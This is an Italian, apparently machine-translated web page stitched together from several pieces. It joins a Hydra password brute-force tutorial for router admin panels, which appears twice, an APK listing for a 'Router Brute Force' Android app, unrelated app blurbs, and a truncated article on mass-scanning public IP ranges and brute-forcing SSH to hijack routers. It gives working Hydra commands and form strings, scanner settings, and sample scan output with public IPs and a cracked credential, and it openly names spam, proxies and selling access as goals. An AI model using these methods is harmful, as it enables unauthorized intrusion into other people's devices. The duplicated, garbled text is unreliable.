Scegli una password e accedi al router. Catturiamo il router: mass scan e brute force SSH. Istruzioni per l'uso dell'applicazione

*Potrebbe esserci un avviso qui che non dovresti usare questo programma per scopi criminali, ma hydra lo scrive prima di ogni sessione di hacking*

In generale, ho deciso di approfondire le impostazioni del router in base alle mie esigenze, guido in un indirizzo familiare a tutti e quindi chiedono la password. Come essere? Bene, ho iniziato a sistemare le password e il loro numero è troppo grande per ordinare tutto e troppo piccolo per ripristinarlo.

E ho aperto Google. Dopo un paio di richieste, ho scoperto una cosa come l'idra. E poi è iniziata: la sete di scoperta, la ricerca dell'ignoto, e così via.

Iniziamo

Per prima cosa ho compilato un dizionario delle password, né più né meno, fino a 25 combinazioni. Quindi, scarica Kali linux o Hydra stesso (se sei un pinguino, hai Linux). Ora abbiamo due opzioni (beh, come due, ho trovato informazioni su due opzioni).

Oppure hai questa finestra di dialogo:

Sia il login che la password sono richiesti dal form presente sul sito. La mia prima opzione, quindi iniziamo con essa. Sulla strada per il "pannello di amministrazione" c'è una guardia sotto forma di una finestra di dialogo. Questo è il tipo di autorizzazione. http ottenere.

Apriamo il terminale. Accedere:

Hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get/
Dove dopo "-l" arriva il login, dopo "-P" il dizionario, dopo "-s" la porta. Abbiamo anche altre bandiere a nostra disposizione:

-R ripristina la precedente sessione interrotta/interrotta

S effettuare una connessione SSL

S PORT se il servizio non è sulla porta predefinita, è possibile impostare la porta qui

L LOGIN o -L FILE con LOGINS (nomi) o caricare più accessi da FILE

P PASSWORD o -P FILE con password per forzare o caricare più password da FILE

X MINIMO: MASSIMO: CHARSET generazione di password per la forza bruta, digitare "-x -h" per assistenza

En nsr "n" - prova con password vuota, "s" - accedi come password e/o "r" - credenziali invertite

U concentrarsi sull'utente, non sulle password (efficace! implicito usando l'opzione -x)

Formato FILE C in cui "login: password" è separato da due punti, invece dell'opzione -L/-P

M FILE elenco dei server da attaccare, una voce per riga, dopo i due punti ":" puoi specificare la porta

O FILE scrive le coppie login/password trovate su FILE invece che sull'output standard

F / -F esce quando login/password corrispondono (-M: -f per host, -F globalmente)

T TASKS numero di TASKS in esecuzione in parallelo (per host, predefinito: 16)

W / -W Timeout risposta TIME (32 secondi) / tra connessioni per thread
-4 / -6 preferiscono gli indirizzi IPv4 (predefinito) o IPv6

V / -V / -d modalità verbale / mostra nome utente+password per ogni tentativo / modalità di debug

Q non stampa i messaggi di errore di connessione

u Dettagli su come utilizzare il modulo
destinazione del server: DNS, IP o 192.168.0.0/24 (questa O l'opzione -M)
servizio di servizio per l'hacking (vedi elenco dei protocolli supportati)
OPT alcuni moduli di servizio supportano input extra (-U per la guida del modulo)


Bene, qualcosa del genere:

Seconda opzione:

Non mio, onestamente tratto da Antichat, con la correzione degli errori grammaticali dell'autore (ho lasciato abbondanti segni di punteggiatura). Mi chiedo se questa può essere considerata una traduzione?

Siamo accolti da un modulo sul sito:


Questo metodo di autenticazione è http-post-form, e qui dobbiamo armeggiare un po', visto che dobbiamo capire come il browser invia i dati al router.

In questo caso ho usato browser Chrome(la sua controparte Chromium in Kalì Linux, installato tramite apt-get install chromium).

Ora devi fare una cosa molto stupida... specificare il nome utente sbagliato e passare...
Perché vedremo dopo...

Premi F12 per passare alla modalità di modifica della pagina web.


Vai a Rete → Attiva la casella di controllo Conserva registro.


Inseriamo login e password falsi...

Bene, che succede? Non funzionerà! Inoltre, dopo diversi tentativi di accesso non andati a buon fine, il modulo viene bloccato per 180 secondi.

Vai alla scheda INTESTAZIONI cercando la linea:

URL di richiesta: http://192.168.0.1/index.cgi
Tagliamo tutto all'indirizzo ip - /index.cgi... Congratulazioni, abbiamo trovato la prima parte dello script di autorizzazione... Andando avanti... Vai alla scheda FORMA DATI e cambia la modalità di visualizzazione in FONTE VIEV.

update_login=login&update_password=password&check_auth=y&tokenget=1300& update_login=login&update_password=password
Bingo! Abbiamo trovato la seconda parte dello script di autorizzazione! Ancora un po! ora devi trovare la pagina con il messaggio di errore... Devi fare clic sulla scheda ELEMENTI.


E scegli Elemento HTML codice (CTRL+MAIUSC+C) e selezionare la finestra con il messaggio di errore... in questo caso - Autenticazione fallita!


Autenticazione fallita!
Scegliere:

span langkey="bad_auth"
e aggiustalo un po'... bad_auth - tutto qui! La chiave è praticamente nelle nostre tasche... Ora possiamo scrivere la stringa di autorizzazione completa:

Index.cgi:update_login=login&update_password=password:bad_auth
Ora devi sostituire ^USER^ invece di "login" e ^PASS^ invece di "password" e quindi la riga sarà simile a:

Index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth
Inseriamo il comando:

Hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth "
Si prega di notare che ci sono due punti tra le parti dello script! è necessario! A proposito, non c'è stato alcun blocco della forma attraverso l'idra ... Questo è molto piacevole.


Non posso assicurarmi che il secondo metodo funzioni, poiché non ho un modello di router adatto. Dovrai fidarti della persona espressiva di Antichat.

Se qualcuno è interessato, per favore, controlla e cancella l'iscrizione nei commenti. Ho lavorato con un router TL-WR1043N / TL-WR1043ND. Router antichat - D-link300NRU.

Grazie per l'attenzione!

Scarica Router Brute Force ADS 2 2.5.6 APK per Android, nome file APK e società di sviluppo APP è . L'ultimo APK Android Vesion Router Brute Force ADS 2 può scaricare gratuitamente l'APK e quindi installarlo sul telefono Android.

Scarica Router Brute Force ADS 2 2.5.5 APK altra versione

Per scaricare altre versioni di Router Brute Force ADS 2, visitare l'archivio APK di Router Brute Force ADS 2.

Scarica Router Brute Force ADS 2.apk file apk Android versione 2.5.5 La dimensione è 243333 md5 è di questa versione Hai bisogno di Eclair 2.0 API livello 5 o superiore, indiciamo la versione da questo file.Codice versione 5 uguale Versione 2.5.5. Puoi Trova ulteriori informazioni tramite la ricerca evz.android.rbf_ads su Google.Se la tua ricerca android,rbf_ads,tools,router,brute,force troverà più come evz.android.rbf_ads,Router Brute Force ADS 2 2.5.5 scaricato 1626 tempo e tutto Tempo di download dell'app Router Brute Force ADS 2. Nuova versione fissa finalmente rilasciata! Si prega di non utilizzare più la vecchia versione, disinstallarla e utilizzare solo questa versione. Forza bruta semplice ed efficace per le pagine di amministrazione/controllo dei router! (Autenticazione di accesso di base -> Base64) Hai una connessione WiFi gratuita? Ma se vuoi Qui Router Brute Force (RBF) viene in aiuto!!! Viene fornito con un file txt di esempio che include 398 password predefinite per diversi router, ma non dimenticare che puoi aggiornarlo con i tuoi dati! Se vuoi inserire password specifiche puoi usare il futuro separato da virgole... Assicurati di controllare il login perché fa distinzione tra maiuscole e minuscole in alcuni router (admin/Admin).Utilizza questo strumento solo se hai un segnale wifi forte e don non utilizzare file di dizionario superiori a 5 MB, altrimenti funzionerà molto lentamente! RBF ottiene automaticamente il gateway predefinito e crea l'URL, quindi non è necessario fare alcun preparato (solo se sei già connesso al wifi). Questo è uno strumento sperimentale, usalo a tuo rischio! Valuta lo strumento e lascia commenti * Si prega di leggere attentamente la descrizione e di non lasciare feedback negativi a causa del segnale wifi basso o dei file di dizionario di grandi dimensioni! *!!! È UN'APP SPERIMENTALE!!! !!! ATTUALMENTE FUNZIONA NON SU TUTTI I ROUTER!!! !!! QUINDI SE VUOI AIUTARE, PER FAVORE LASCI FEEDBACK CON IL TUO MODELLO DI ROUTER E PRODUTTORE !!! **

*Potrebbe esserci un avviso qui che non dovresti usare questo programma per scopi criminali, ma hydra lo scrive prima di ogni sessione di hacking*

In generale, ho deciso di approfondire le impostazioni del router in base alle mie esigenze, guido in un indirizzo familiare a tutti e quindi chiedono la password. Come essere? Bene, ho iniziato a sistemare le password e il loro numero è troppo grande per ordinare tutto e troppo piccolo per ripristinarlo.

E ho aperto Google. Dopo un paio di richieste, ho scoperto una cosa come l'idra. E poi è iniziata: la sete di scoperta, la ricerca dell'ignoto, e così via.

Iniziamo

Per prima cosa ho compilato un dizionario delle password, né più né meno, fino a 25 combinazioni. Quindi, scarica Kali linux o Hydra stesso (se sei un pinguino, hai Linux). Ora abbiamo due opzioni (beh, come due, ho trovato informazioni su due opzioni).

Oppure hai questa finestra di dialogo:

Sia il login che la password sono richiesti dal form presente sul sito. La mia prima opzione, quindi iniziamo con essa. Sulla strada per il "pannello di amministrazione" c'è una guardia sotto forma di una finestra di dialogo. Questo è il tipo di autorizzazione. http ottenere.

Apriamo il terminale. Accedere:

Hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get/
Dove dopo "-l" arriva il login, dopo "-P" il dizionario, dopo "-s" la porta. Abbiamo anche altre bandiere a nostra disposizione:

-R ripristina la precedente sessione interrotta/interrotta

S effettuare una connessione SSL

S PORT se il servizio non è sulla porta predefinita, è possibile impostare la porta qui

L LOGIN o -L FILE con LOGINS (nomi) o caricare più accessi da FILE

P PASSWORD o -P FILE con password per forzare o caricare più password da FILE

X MINIMO: MASSIMO: CHARSET generazione di password per la forza bruta, digitare "-x -h" per assistenza

En nsr "n" - prova con password vuota, "s" - accedi come password e/o "r" - credenziali invertite

U concentrarsi sull'utente, non sulle password (efficace! implicito usando l'opzione -x)

Formato FILE C in cui "login: password" è separato da due punti, invece dell'opzione -L/-P

M FILE elenco dei server da attaccare, una voce per riga, dopo i due punti ":" puoi specificare la porta

O FILE scrive le coppie login/password trovate su FILE invece che sull'output standard

F / -F esce quando login/password corrispondono (-M: -f per host, -F globalmente)

T TASKS numero di TASKS in esecuzione in parallelo (per host, predefinito: 16)

W / -W Timeout risposta TIME (32 secondi) / tra connessioni per thread
-4 / -6 preferiscono gli indirizzi IPv4 (predefinito) o IPv6

V / -V / -d modalità verbale / mostra nome utente+password per ogni tentativo / modalità di debug

Q non stampa i messaggi di errore di connessione

u Dettagli su come utilizzare il modulo
destinazione del server: DNS, IP o 192.168.0.0/24 (questa O l'opzione -M)
servizio di servizio per l'hacking (vedi elenco dei protocolli supportati)
OPT alcuni moduli di servizio supportano input extra (-U per la guida del modulo)


Bene, qualcosa del genere:

Seconda opzione:

Non mio, onestamente tratto da Antichat, con la correzione degli errori grammaticali dell'autore (ho lasciato abbondanti segni di punteggiatura). Mi chiedo se questa può essere considerata una traduzione?

Siamo accolti da un modulo sul sito:


Questo metodo di autenticazione è http-post-form, e qui dobbiamo armeggiare un po', visto che dobbiamo capire come il browser invia i dati al router.

In questo caso, ho usato il browser Chrome (il suo analogo di Chromium in Kali Linux è installato tramite apt-get install chromium).

Ora devi fare una cosa molto stupida... specificare il nome utente sbagliato e passare...
Perché vedremo dopo...

Premi F12 per passare alla modalità di modifica della pagina web.


Vai a Rete → Attiva la casella di controllo Conserva registro.


Inseriamo login e password falsi...

Bene, che succede? Non funzionerà! Inoltre, dopo diversi tentativi di accesso non andati a buon fine, il modulo viene bloccato per 180 secondi.

Vai alla scheda INTESTAZIONI cercando la linea:

URL di richiesta: http://192.168.0.1/index.cgi
Tagliamo tutto all'indirizzo ip - /index.cgi... Congratulazioni, abbiamo trovato la prima parte dello script di autorizzazione... Andando avanti... Vai alla scheda FORMA DATI e cambia la modalità di visualizzazione in FONTE VIEV.

update_login=login&update_password=password&check_auth=y&tokenget=1300& update_login=login&update_password=password
Bingo! Abbiamo trovato la seconda parte dello script di autorizzazione! Ancora un po! ora devi trovare la pagina con il messaggio di errore... Devi fare clic sulla scheda ELEMENTI.


E seleziona l'elemento del codice HTML (CTRL + MAIUSC + C) e seleziona la finestra con il messaggio di errore ... in questo caso - Autenticazione non riuscita!


Autenticazione fallita!
Scegliere:

span langkey="bad_auth"
e aggiustalo un po'... bad_auth - tutto qui! La chiave è praticamente nelle nostre tasche... Ora possiamo scrivere la stringa di autorizzazione completa:

Index.cgi:update_login=login&update_password=password:bad_auth
Ora devi sostituire ^USER^ invece di "login" e ^PASS^ invece di "password" e quindi la riga sarà simile a:

Index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth
Inseriamo il comando:

Hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth "
Si prega di notare che ci sono due punti tra le parti dello script! è necessario! A proposito, non c'è stato alcun blocco della forma attraverso l'idra ... Questo è molto piacevole.


Non posso assicurarmi che il secondo metodo funzioni, poiché non ho un modello di router adatto. Dovrai fidarti della persona espressiva di Antichat.

Se qualcuno è interessato, per favore, controlla e cancella l'iscrizione nei commenti. Ho lavorato con un router TL-WR1043N / TL-WR1043ND. Router antichat - D-link300NRU.

Grazie per l'attenzione!

Router Brute force può essere scaricato su smartphone, telefoni o tablet con versioni Android 3.0, 3.1, 3.2, 4.0, 4.1, 4.2+

Come installare l'app Android Router Brute Force sul computer

Per cominciare versione mobile applicazioni sul PC di cui hai bisogno:
  • installa scaricato emulatore bluestacks;
  • scaricare il file APK dell'applicazione;
  • trascina il file nella schermata principale di Bluestacks;
  • attendere il completamento automatico dell'installazione.

Scarica altre applicazioni utili:

    Fare screenshot lunghi
    Stitchcraft Free semplifica l'unione di più screenshot in uno lungo. Proprio come l'acquisizione a scorrimento

    Con l'aiuto di Wi-Fi Talkie, puoi organizzare l'interazione dei dispositivi a distanza di azione segnale wifi senza dover avere accesso

  • Navitel Navigator è un sistema di navigazione che contiene una varietà di dati: ingorghi, informazioni sulle telecamere di sorveglianza della polizia stradale (SPEEDCAM), modelli tridimensionali di incroci stradali e strutture architettoniche significative.

    Procedura guidata di ottimizzazione della memoria efficiente per migliorare la velocità del dispositivo
    Memory Booster aiuterà a migliorare la velocità

  • Versione: 3.2.
    Sviluppatore: Adva Soft
    Requisiti: sistema operativo Android 2.

    Descrizione:
    TSF Launcher 3D Shell - Innovativo
    launcher che ti consente di eseguire completamente
    organizzare liberamente i widget,
    eseguire più

A differenza dei server a tutti gli effetti, in cui sono generalmente configurati PAM (Pluggable Authentication Modules), che limita l'accesso al server per un periodo di tempo specificato nella configurazione dopo diversi tentativi di accesso (di solito da tre a cinque) non riusciti, il router Linux viene troncato. Non c'è PAM su di esso, quindi nulla impedisce che sia bruto. E questa idea - brutalità e cattura dei router - oggi, si potrebbe dire, è di tendenza!

Il nostro obiettivo è il tuo router

Perché è necessario acquisire il router? Dipende dall'immaginazione dell'hacker: puoi usarlo per inviare spam, renderlo un calzino privato (proxy). E puoi vendere l'accesso che ottieni: questo piacere costa, secondo uno dei miei amici, fino a $ 200 al mese e questo prodotto è piuttosto popolare.

Scansione dei router

Per ottenere l'accesso, gli hacker utilizzano un programma semplice ma efficace Scanner per tunnel. Il parametro Type specifica il tipo di scansione: per login statico, per password statica, per elenco di login/password. La terza opzione (Per accesso; Elenco password) è solitamente la più efficiente.

Il parametro Statico consente di impostare l'intervallo di indirizzi IP che verranno scansionati. Se abiliti la casella di controllo Intervalli IP da file, l'intervallo di indirizzi IP verrà preso dal file specificato nel campo Intervalli IP (per impostazione predefinita, questo è un file denominato ip.txt). Gli intervalli in esso contenuti sono indicati, come mostrato nella schermata seguente.

L'elenco di accessi e password è specificato dal parametro Login;Password. Per impostazione predefinita, è preso dal file words.txt. Ovviamente, l'esempio di elenco qui sotto è piuttosto scarso, ma penso che tu possa facilmente trovarne uno più avanzato sul Web (oppure puoi essere intelligente e crearne uno tuo).


Il parametro Threads specifica il numero di thread simultanei da brutare. Il valore predefinito è 900, che è più che sufficiente. Il parametro Timeout consente di specificare il timeout in secondi tra i tentativi.

Bene, resta da premere il pulsante Start.

Come puoi vedere, abbiamo già ricevuto i primi risultati. Analizziamoli:

37.112.128.160 - connessione non riuscita 37.112.128.164 - verifica admin;admin 37.112.128.163 - connessione non riuscita 37.112.128.162 - connessione non riuscita : admin;admin 37.112.128.164 - verifica supporto;supporto 37.112.128.164 - [-]: supporto ;support 37.112.128.164 - verifica root;123456 37.112.128.164 - [-]: root;123456 37.112.128.164 - verifica ubnt;ubnt 37.112.128.164 - [-]: ubnt;ubnt 37.112.128.164 - verifica ftp;1112345 - verifica ftp;112.3 128.164 - [+]: ftp;123456 …

Il numero tra parentesi quadre è il numero del flusso (per noi non importa). Successivamente, viene indicato l'indirizzo IP scansionato. La mancata connessione della linea significa che la porta SSH è chiusa, completamente o per noi (dal firewall). Una riga come [-]: admin;admin segnala che la porta SSH è aperta, ma la password e/o il login non corrispondono. Ed ecco una linea simile con + dice che tutto ha avuto successo:

Continua disponibile solo per i membri

Opzione 1. Unisciti alla community del "sito" per leggere tutti i materiali sul sito

L'appartenenza alla community durante il periodo specificato ti darà accesso a TUTTI i materiali Hacker, aumenterà il tuo sconto cumulativo personale e ti consentirà di accumulare un punteggio Xakep professionale!

Condividi con gli amici o salva per te:

Caricamento in corso...